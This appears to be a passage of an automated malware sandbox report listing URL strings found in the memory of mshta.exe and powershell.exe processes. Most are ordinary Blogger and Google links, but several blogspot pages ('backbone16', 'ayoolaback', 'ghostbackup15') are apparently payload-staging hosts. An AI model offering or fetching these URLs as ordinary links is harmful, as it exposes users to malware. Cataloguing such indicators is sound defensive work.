Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574669263.000001BEEAD9D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.560022885.000001BEE8B29000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389838289.000001BEEAD9D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22?interstitial=ABqL8_gMUWN-Fb5CRZeUkUzLUgJkq
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22?~D
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22P
Source: mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22adients_light.pngight.png1
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22b
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22g
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22h
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22https://www.blogger.com/static/v1/jsbin/403
Source: mshta.exe, 0000001D.00000002.582770017.000001BEEB058000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22https://www.google-analytics.com/debug/boot
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22i
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22k
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22m
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22q
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.352270574.000001BEEAD56000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog
Source: mshta.exe, 0000001D.00000002.532775545.000001B6E5D90000.00000004.00000040.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html=Internet
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.hty
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.541490035.000001B6E5EFA000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.571074707.000001BEEACBC000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/search
Source: mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp String found in binary or memory: https://stats.g.doubleclick.net/j/collecta.U
Source: mshta.exe, 00000021.00000002.611323533.0000021CF70B0000.00000004.00000001.sdmp String found in binary or memory: https://stats.g.doubleclick.net/j/collecthttps://www.google.com/ads/ga-audienceshttps://www.google.%
Source: mshta.exe, 00000006.00000003.300811461.000000000AE98000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.508915853.00000290ACEA4000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342424142.00000215A3D5D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623774532.00000215A9630000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.611323533.0000021CF70B0000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://tagassistant.google.com/
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://tagassistant.google.com/E
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://translate.google.co.uk/?hl=en-GB&tab=jT
Source: mshta.exe, 00000006.00000003.308074680.000000000E06B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/intent/tweet?text=
Source: powershell.exe, 00000016.00000002.427496581.000001ACB4DC6000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.505010455.000001ACC4FE9000.00000004.00000001.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://wwog.com;
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559632238.000001BEE8B06000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559451367.000001BEE8ADF000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com#
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com-lef
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574438188.0000021CF46CA000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/.
Source: mshta.exe, 00000006.00000003.389928116.000000000A469000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/1
Source: mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/:
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284167006.000000000E037000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315918707.000000000DF11000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.402196536.000000000A2FA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462832097.00000290ABE2B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.609912843.000001BEED35E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.604188808.000001BEED297000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383485693.000001BEEDE14000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383394302.000001BEEDDFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/?tab=jj8
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/I
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g&ec=GAZAHg
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g.
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.gh
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.gom/
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.313544011.0000000008DE7000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.579813740.00000215A6273000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.596761635.000001BEED0E4000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.570960406.0000021CF45F3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g)
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.h
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/
Source: mshta.exe, 0000001D.00000003.352421705.000001BEEAD2C000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.htm
Source: mshta.exe, 0000001B.00000002.575444266.00000215A6101000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoo
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574033424.0000021CF46A0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghost
Source: mshta.exe, 00000006.00000003.284901391.000000000A352000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.
Source: mshta.exe, 0000000D.00000003.516075909.00000290ACF21000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoo
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559451367.000001BEE8ADF000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbo
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.htm
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.586924021.0000021CF6679000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.h
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400514867.00000000067A1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.314926949.0000000006788000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.271994315.00000000067DE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/
Source: mshta.exe, 0000001D.00000002.540418330.000001B6E5EC1000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=3337584593152806955
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=3337584593152806955W
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/content.g
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/content.g&
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/content.gl
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540620819.00000214F0066000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-
Source: mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=
Source: mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-
Source: mshta.exe, 0000001D.00000002.571748112.000001BEEACFA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0
Source: mshta.exe, 0000001D.00000002.540524758.000001B6E5ED0000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/f
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/1690726786805467605/posts/default
Source: mshta.exe, 0000000D.00000003.507208512.00000290ACE9A000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.463266750.00000290ABE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/4778963473423104316/posts/default
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/7680886694920034828/posts/default
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/7680886694920034828/posts/defaultd
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.429665706.00000000068D5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.313744696.000000000DF59000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426367126.0000000006762000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.334926065.000000000A32E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/8965474558532949541/posts/default
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/9027821174359424672/posts/default
Source: mshta.exe, 00000006.00000003.396883475.000000000684E000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.363612560.00000290A9A6C000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559632238.000001BEE8B06000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554389602.0000021CF2287000.00000004.00000001.sdmp, mshta.exe, 00000026.00000003.471301804.000002632CBA6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/adspersonalization
Source: mshta.exe, 00000006.00000003.288887677.0000000008E96000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.579813740.00000215A6273000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.557558102.00000215A3CFF000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/go/blogspot-cookies
Source: mshta.exe, 00000021.00000002.570960406.0000021CF45F3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/blogspot-cookiesfunction
Source: mshta.exe, 00000006.00000003.396240494.00000000068E6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/blogspot-lr
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz#
Source: mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz)
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz2
Source: mshta.exe, 00000006.00000003.335402852.00000000067B2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz5
Source: mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz6
Source: mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz?
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.389928116.000000000A469000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy
Source: mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy/products?tab=jh/posts/defaultD=3337584593152806955pencil
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy0
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyAClC
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyJ
Source: mshta.exe, 00000006.00000003.309050554.000000000E037000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyPz
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyT
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy_
Source: mshta.exe, 00000006.00000003.389928116.000000000A469000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyt
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309308738.000000000A35F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapi
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapi)
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapiJ
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapiM
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapiz
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforum
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumF
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumU
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumf
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumq
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discuss
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discussD
